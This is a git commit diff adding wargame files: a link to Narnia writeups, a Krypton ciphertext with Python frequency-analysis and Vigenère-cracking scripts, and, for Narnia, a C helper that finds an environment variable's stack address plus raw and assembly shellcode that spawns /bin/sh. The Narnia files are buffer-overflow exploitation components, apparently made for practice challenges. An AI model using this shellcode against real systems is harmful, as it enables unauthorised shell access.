some small fixes

CTFs_and_WarGames/WARGAMES/README.md

@@ -0,0 +1,3 @@
+## Writeups:
+
+[Narnia 1-5]: http://bt3gl.github.io/smashing-the-stack-for-fun-or-wargames-narnia-0-4.html

CTFs_and_WarGames/WARGAMES/krypton/cipher.txt

@@ -0,0 +1 @@
+CGZNL YJBEN QYDLQ ZQSUQ NZCYD SNQVU BFGBK GQUQZ QSUQN UZCYD SNJDS UDCXJ ZCYDS NZQSU QNUZB WSBNZ QSUQN UDCXJ CUBGS BXJDS UCTYV SUJQG WTBUJ KCWSV LFGBK GSGZN LYJCB GJSZD GCHMS UCJCU QJLYS BXUMA UJCJM JCBGZ CYDSN CGKDC ZDSQZ DVSJJ SNCGJ DSYVQ CGJSO JCUNS YVQZS WALQV SJJSN UBTSX COSWG MTASN BXYBU CJCBG UWBKG JDSQV YDQAS JXBNS OQTYV SKCJD QUDCX JBXQK BMVWA SNSYV QZSWA LWAKB MVWAS ZBTSS QGWUB BGJDS TSJDB WCUGQ TSWQX JSNRM VCMUZ QSUQN KDBMU SWCJJ BZBTT MGCZQ JSKCJ DDCUE SGSNQ VUJDS SGZNL YJCBG UJSYY SNXBN TSWAL QZQSU QNZCY DSNCU BXJSG CGZBN YBNQJ SWQUY QNJBX TBNSZ BTYVS OUZDS TSUUM ZDQUJ DSICE SGNSZ CYDSN QGWUJ CVVDQ UTBWS NGQYY VCZQJ CBGCG JDSNB JULUJ STQUK CJDQV VUCGE VSQVY DQASJ UMAUJ CJMJC BGZCY DSNUJ DSZQS UQNZC YDSNC USQUC VLANB FSGQG WCGYN QZJCZ SBXXS NUSUU SGJCQ VVLGB ZBTTM GCZQJ CBGUS ZMNCJ LUDQF SUYSQ NSYNB WMZSW TBUJB XDCUF GBKGK BNFAS JKSSG QGWDC USQNV LYVQL UKSNS TQCGV LZBTS WCSUQ GWDCU JBNCS UESGN SUDSN QCUSW JBJDS YSQFB XUBYD CUJCZ QJCBG QGWQN JCUJN LALJD SSGWB XJDSU COJSS GJDZS GJMNL GSOJD SKNBJ STQCG VLJNQ ESWCS UMGJC VQABM JCGZV MWCGE DQTVS JFCGE VSQNQ GWTQZ ASJDZ BGUCW SNSWU BTSBX JDSXC GSUJS OQTYV SUCGJ DSSGE VCUDV QGEMQ ESCGD CUVQU JYDQU SDSKN BJSJN QECZB TSWCS UQVUB FGBKG QUNBT QGZSU QGWZB VVQAB NQJSW KCJDB JDSNY VQLKN CEDJU TQGLB XDCUY VQLUK SNSYM AVCUD SWCGS WCJCB GUBXI QNLCG EHMQV CJLQG WQZZM NQZLW MNCGE DCUVC XSJCT SQGWC GJKBB XDCUX BNTSN JDSQJ NCZQV ZBVVS QEMSU YMAVC UDSWJ DSXCN UJXBV CBQZB VVSZJ SWSWC JCBGB XDCUW NQTQJ CZKBN FUJDQ JCGZV MWSWQ VVAMJ JKBBX JDSYV QLUGB KNSZB EGCUS WQUUD QFSUY SQNSU

CTFs_and_WarGames/WARGAMES/krypton/freq_count.py

@@ -0,0 +1,27 @@
+#!/bin/python
+
+import string
+import sys
+import operator
+
+def find_frequency(msg):
+    dict_freq = dict([(c, 0) for c in string.lowercase])
+    total_letters = 0.0
+    for c in msg.lower():
+        if 'a'<= c <= 'z':
+            dict_freq[c] += 1
+            total_letters += 1
+    list_freq = sorted(dict_freq.items(), key=operator.itemgetter(1))
+    return list_freq
+
+
+
+def main(filename):
+    with open(filename, 'r') as f:
+       cipher = f.readlines()
+       cipher = cipher[0].strip()
+       print(find_frequency(cipher))
+
+
+if __name__ == "__main__":
+	main(str(sys.argv[1]))

CTFs_and_WarGames/WARGAMES/krypton/freq_count_vig.py

@@ -0,0 +1,51 @@
+#!/bin/python
+
+__author__= 'bt3gl'
+
+import string
+import sys
+import operator
+
+
+FREQ_ENGLISH = [0.0749, 0.0129, 0.0354, 0.0362, 0.1400, 0.0218, 0.0174, 0.0422, 0.0665, 0.0027, 0.0047, 0.0357,0.0339, 0.0674, 0.0737, 0.0243, 0.0026, 0.0614, 0.0695, 0.0985, 0.0300, 0.0116, 0.0169, 0.0028, 0.0164, 0.0004]
+
+
+def find_frequency(msg):
+    dict_freq = dict([(c, 0) for c in string.lowercase])
+    total_letters = 0.0
+    for c in msg.lower():
+        if 'a'<= c <= 'z':
+            dict_freq[c] += 1
+            total_letters += 1
+    list_freq = sorted(dict_freq.items(), key=operator.itemgetter(1))
+    return [(c, freq/total_letters) for (c, freq) in list_freq]
+
+
+
+def main(filename):
+    with open(filename, 'r') as f:
+       cipher = f.readlines()
+       cipher = cipher[0].strip()
+       flist = find_frequency(cipher)
+       elist = dict((k, value) for (k, value) in  zip(string.lowercase, FREQ_ENGLISH))
+       elist = sorted(elist.items(), key=operator.itemgetter(1))
+       trans, key = '', ''
+       for i, f in enumerate(flist):
+          trans += f[0]
+          key += elist[i][0]
+          print "CIPHER: %s -> %.5f, ENGLISH: %s -> %.5f" %(f[0], f[1], elist[i][0], elist[i][1])
+       print "Key is " + key + " for " + trans
+       
+       # print key sorted to translate to a-z
+       res = zip(trans, key)
+       res.sort()
+       trans, key = '', ''
+       for letter in res:
+		trans += letter[1].upper()
+		key += letter[0].upper()
+       print "tr  [" + key + "] [" + trans + "]"
+
+
+if __name__ == "__main__":
+	main(str(sys.argv[1]))
+

CTFs_and_WarGames/WARGAMES/krypton/vige.py

@@ -0,0 +1,39 @@
+import sys
+from pygenere import Vigenere, VigCrack
+
+
+def get_key(msg):
+  # Vigenere Cypher
+  key =  VigCrack(msg).crack_codeword()
+  dec_msg = VigCrack(msg).crack_message()
+  dec_msg =  dec_msg.replace(" ", "")
+  return key, dec_msg
+
+
+def solve(msg, key):
+  dec_msg = Vigenere(msg).decipher(key)
+  dec_msg =  dec_msg.replace(" ", "")
+  return dec_msg
+
+
+
+if __name__ == '__main__':
+
+  # getting the key
+  with open('cipher', 'r') as f:
+        msg = f.readlines()
+        msg_in = msg[0].strip()
+        key, answer = get_key(msg_in)
+        print 'Message: ' + msg_in
+        print
+        print 'Answer: ' + answer
+        print '(key: ' + key + ')'
+  
+
+  # deciphering                                 
+  key = 'FREKEY'
+  with open('pass', 'r') as f:
+	msg = f.readlines()
+	answer = solve(msg[0].strip(), key)
+	print
+	print "The answer is: " + answer

CTFs_and_WarGames/WARGAMES/narnia/getshadd.c

@@ -0,0 +1,12 @@
+// usage: ./getshadd ENVVAR BINARY
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int main(int argc,char *argv[]){
+        char *ptr;
+        ptr=getenv(argv[1]);
+        ptr+=(strlen(argv[0])-strlen(argv[2]))*2;
+        printf("%s will be at %p\n",argv[1],ptr);
+        return 0;
+}

CTFs_and_WarGames/WARGAMES/narnia/shellspawn

@@ -0,0 +1 @@
+1ÀPh//shh/bin‰ãP‰âP‰á°Í€

CTFs_and_WarGames/WARGAMES/narnia/shellspawn.asm

@@ -0,0 +1,14 @@
+BITS 32
+
+xor eax, eax        ; zero eax
+push eax            ; null terminate the string
+push 0x68732f2f     ; push //sh (// is same as / for our purpose)
+push 0x6e69622f     ; push /bin
+mov ebx, esp        ; pass first argument using ebx
+push eax            ; third argument is empty
+mov edx, esp
+push eax            ; second argument is empty
+mov ecx, esp
+mov al, 11          ; execve is system call #11
+int 0x80            ; issue an interrupt
+